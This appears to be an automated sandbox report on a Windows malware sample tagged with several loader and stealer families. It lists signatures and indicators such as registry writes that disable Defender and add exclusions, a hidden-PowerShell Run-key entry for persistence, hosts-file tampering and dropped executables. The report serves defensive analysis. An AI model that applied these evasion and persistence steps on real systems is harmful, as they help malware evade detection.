Malware Analysis Report

2025-08-10 21:54

Sample ID 231025-fg198sfb5y
Target 3sO43CV.exe
SHA256 b38974ff3894deba1a8051bfa42733f2099cd2d65460aabb804b4e6583fa4716
Tags
smokeloader amadey dcrat glupteba raccoon redline zgrat 6a6a005b9aa778f606280c5fa24ae595 grome kinza up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat rootkit spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b38974ff3894deba1a8051bfa42733f2099cd2d65460aabb804b4e6583fa4716

Threat Level: Known bad

The file 3sO43CV.exe was found to be: Known bad.

Malicious Activity Summary

smokeloader amadey dcrat glupteba raccoon redline zgrat 6a6a005b9aa778f606280c5fa24ae595 grome kinza up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat rootkit spyware stealer trojan upx

SmokeLoader

Amadey

Windows security bypass

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

ZGRat

RedLine payload

Modifies Windows Defender Real-time Protection settings

Detect ZGRat V1

Glupteba

Smokeloader family

DcRat

Detected google phishing page

Glupteba payload

Raccoon

Raccoon Stealer payload

Modifies boot configuration data using bcdedit

Drops file in Drivers directory

Possible attempt to disable PatchGuard

Blocklisted process makes network request

Downloads MZ/PE file

Stops running service(s)

Modifies Windows Firewall

Checks BIOS information in registry

Deletes itself

Executes dropped EXE

Windows security modification

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Unexpected DNS network traffic destination

UPX packed file

Accesses cryptocurrency files/wallets, possible credential harvesting

Manipulates WinMonFS driver.

Adds Run key to start application

Checks installed software on the system

Manipulates WinMon driver.

Drops Chrome extension

Legitimate hosting services abused for malware hosting/C2

Drops desktop.ini file(s)

Suspicious use of SetThreadContext

Drops file in System32 directory

Checks for VirtualBox DLLs, possible anti-VM trick

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious use of SetWindowsHookEx

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Creates scheduled task(s)

Modifies data under HKEY_USERS

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Modifies registry class

Uses Task Scheduler COM API

Modifies system certificate store

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious behavior: MapViewOfSection

Enumerates system info in registry

Suspicious behavior: LoadsDriver

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-25 04:51

Signatures

Smokeloader family

smokeloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-25 04:51

Reported

2023-10-25 04:58

Platform

win7-20231023-en

Max time kernel

308s

Max time network

333s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Detected google phishing page

phishing google

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8866.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\8866.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\8866.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8866.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\8866.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\8866.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wUBDPVxDQVpvNZiy = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\conhost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nBRnpywzcTvqknVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\DllHost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\conhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GpfcWYRxKqUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\schtasks.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR = "0" C:\Windows\system32\conhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oVhJPNkDU = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wUBDPVxDQVpvNZiy = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KrPQunXfXpAVC = "0" C:\Windows\system32\conhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oVhJPNkDU = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wUBDPVxDQVpvNZiy = "0" C:\Windows\system32\DllHost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DlbZONUGhjVU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GpfcWYRxKqUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DlbZONUGhjVU2 = "0" C:\Windows\system32\conhost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\conhost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wUBDPVxDQVpvNZiy = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KrPQunXfXpAVC = "0" C:\Windows\SysWOW64\schtasks.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nBRnpywzcTvqknVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS3A14.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\80D3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\82F6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8568.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8866.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8AC7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\12BC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\155C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\17EC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS37F2.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS3A14.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\K.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54CE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6CE1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\rVzNwXv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\80D3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80D3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8AC7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\12BC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\12BC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\12BC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\12BC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\17EC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\17EC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\12BC.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\12BC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS37F2.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS37F2.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS37F2.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\12BC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS37F2.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS3A14.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS3A14.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS3A14.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-1R05I.tmp\is-TP019.tmp N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6CE1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 51.159.66.125 N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\8866.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\8866.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\155C.exe'\"" C:\Users\Admin\AppData\Local\Temp\155C.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\80D3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
